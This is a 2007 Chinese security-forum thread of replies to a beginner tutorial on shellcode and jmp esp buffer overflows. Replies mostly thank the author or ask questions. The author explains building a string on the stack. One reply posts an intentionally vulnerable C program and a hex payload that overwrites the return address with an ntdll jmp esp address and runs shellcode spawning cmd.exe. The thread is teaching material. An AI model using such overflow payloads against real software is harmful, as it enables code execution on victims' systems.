首页
社区
课程
招聘
[技术专题]软件漏洞分析入门_6_初级shellcode_定位缓冲区
发表于: 2007-12-18 21:23 42586

[技术专题]软件漏洞分析入门_6_初级shellcode_定位缓冲区

2007-12-18 21:23
42586
收藏
免费 7
支持
分享
最新回复 (106)
雪    币: 243
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
26
呵呵,吱一声,好玩哟
2007-12-20 10:30
0
雪    币: 221
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
27
是如何得到参数的地址的?
68 77 65 73 74  PUSH 74736577  
68 66 61 69 6C  PUSH 6C696166
这2个地址应该是"failwest"的地址吧?是如何得到这2个地址的呢?
还有cpu如何知道一个参数已经结束?接下来的是第2个参数呢?如果是在参数末尾加\0,那要怎么写汇编代码呢?希望大牛们写个代码让我看看,先行谢过了!期待...
2007-12-20 11:07
0
雪    币: 2041
活跃值: (261)
能力值: (RANK:330 )
在线值:
发帖
回帖
粉丝
28
其实
push ebx // cut string
                push 0x74736577
                push 0x6C696166//push failwest
并不是压得参数本身,只是把failwest存入内存,这里为了简单,就直接存到栈里了,当然存任何地方都可以

首先记得ESP永远指向栈顶,那么:

PUSH ebx
这句就是在栈里放个0,因为EBX已经在前一句清0了,这时ESP指向这个0

top
0 《---esp
bottom

push 0x74736577
向栈中压入“west”。这时ESP指向“west”,当然后面跟着先前的0,刚好构成字符串

top
west  《----esp
0
bottom

push 0x6C696166
向栈中压入“fail”。这是ESP指向“fail”,当然后面跟着先前的west和0

top
fail  《---esp
west
0
bottom

所以这时的ESP值相当于指向字符串failwest的指针,把它保存在EAX里边

are we clear now?

我们最终的参数只是调用前的四次压栈,两次EBX(0),两次EAX(字符串指针)

至于函数怎么用这些参数,请你回去精读第3讲中的内容,或者自己写点传参数的例子,亲自动手跟几遍就彻底明白了——这是搞清问题的最有效办法
2007-12-20 11:23
0
雪    币: 437
活跃值: (273)
能力值: ( LV12,RANK:240 )
在线值:
发帖
回帖
粉丝
29
看了楼上的帖子 想到一个成语 循循善诱~
2007-12-20 12:01
0
雪    币: 221
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
30
多谢老大,弄清楚68 77 65 73 74  PUSH 74736577  68 66 61 69 6C  PUSH 6C696166
了,先前一直以为是字符串的地址,原来就是字符串!
再次感谢!`
2007-12-20 13:11
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
看完这个  心里就2个字.......阴险......ESP指向溢出覆盖地址的后面 原来是利用堆栈平衡...
2007-12-20 19:48
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
32
老师下一讲什么时候呢?期待哈~早点端凳子等着
2007-12-20 21:03
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
33
吱——吱——吱
2007-12-20 21:42
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
继续学习中,楼主辛苦
2007-12-21 00:09
0
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
不错,呵呵,我喜欢,呵呵
2007-12-21 14:22
0
雪    币: 218
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
出的好慢呀,7什么时候出呀!!等不急了,最好快点出书吧
2007-12-21 20:29
0
雪    币: 817
活跃值: (1927)
能力值: ( LV12,RANK:2670 )
在线值:
发帖
回帖
粉丝
37
讲的非常精彩,赞一个
2007-12-22 03:34
0
雪    币: 409
活跃值: (982)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
38
哇哈哈哈  先顶后看
2007-12-22 15:06
0
雪    币: 135
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
吱——吱——吱
2007-12-22 15:11
0
雪    币: 112
活跃值: (16)
能力值: ( LV9,RANK:290 )
在线值:
发帖
回帖
粉丝
40
吱——吱——吱
==============
提问:"万年不变的jmp esp"可否提供几个!
2007-12-22 20:58
0
雪    币: 243
活跃值: (14)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
41
吱~~~~~~~~~~~~~~~~~~~~~~~~
2007-12-23 00:03
0
雪    币: 207
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
42
吱............................
看到用jmp esp的说明,有点不明白,可是老大后面的说明并没有用jump esp, 是笔误码吗?
2007-12-23 00:47
0
雪    币: 243
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
43
是啊!昨天晚上我看到一半就熄灯了,回去想了好久也想不出来!今天看了才知道原来是这样来"稳定"啊 呵呵
2007-12-24 14:09
0
雪    币: 243
活跃值: (10)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
44
不是!他是说用这jmp esp指令所在的地址啊
2007-12-24 14:11
0
雪    币: 31
活跃值: (15)
能力值: ( LV9,RANK:170 )
在线值:
发帖
回帖
粉丝
45
菜鸟问题:
例子中的缓冲区是在子函数中,如果说子函数中没有缓冲区,而是由main函数获得读取字符串并传给子函数的一个字符串指针,里面只是调用了strcmp比较一下,这样的方式有没有什么好的解决办法?
2007-12-24 14:27
0
雪    币: 223
活跃值: (302)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
学习一下,还好能看明白.
2007-12-24 20:29
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
47
学习
吱--------吱--------吱
2007-12-26 17:30
0
雪    币: 214
活跃值: (14)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
48
我想了好久才做出来了一个 是简单的返回一个cmd窗口
JMP ESP 是在ntdll里面找到的
7C961EED    FFE4            JMP ESP
我在本机测试没有问题  (你们看看有没有出错 不返回cmd窗口)
-----------------------------------------------------------
测试代码:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int fun(char *path);
int main(int argc, char *argv[])
{
  fun("1.txt");
  system("PAUSE");       
  return 0;
}
int fun(char *path)
{
   char buf[10];
   FILE *fp = fopen("1.txt","r+");
   fscanf(fp,"%s",buf);
   fclose(fp);
   puts(buf);
   return 1;
}
--------------------------------------------------
1.txt 文件内容 16进制编辑器复制出来的
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   61 61 61 61 61 61 61 61  61 61 61 61 61 61 61 61   aaaaaaaaaaaaaaaa
00000010   61 61 61 61 61 61 61 61  61 61 61 61 ED 1E 96 7C   aaaaaaaaaaaa?東
00000020   55 89 E5 6A 00 68 65 78  65 00 68 63 6D 64 2E 54   U夊j.hexe.hcmd.T
00000030   B8 90 18 40 00 FF D0 5D                            笎.@.衇
2007-12-26 19:43
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
学习了,,,
2007-12-27 19:22
0
雪    币: 224
活跃值: (10)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
50
恩,确实不错
但是我感觉还是没能及时的消化完
是不是这篇文章与第五篇的区别就在于,不用查找缓冲区的地址了???
但是其他的模块函数的地址仍然要手动查找?
2007-12-27 20:52
0
游客
登录 | 注册 方可回帖
返回
//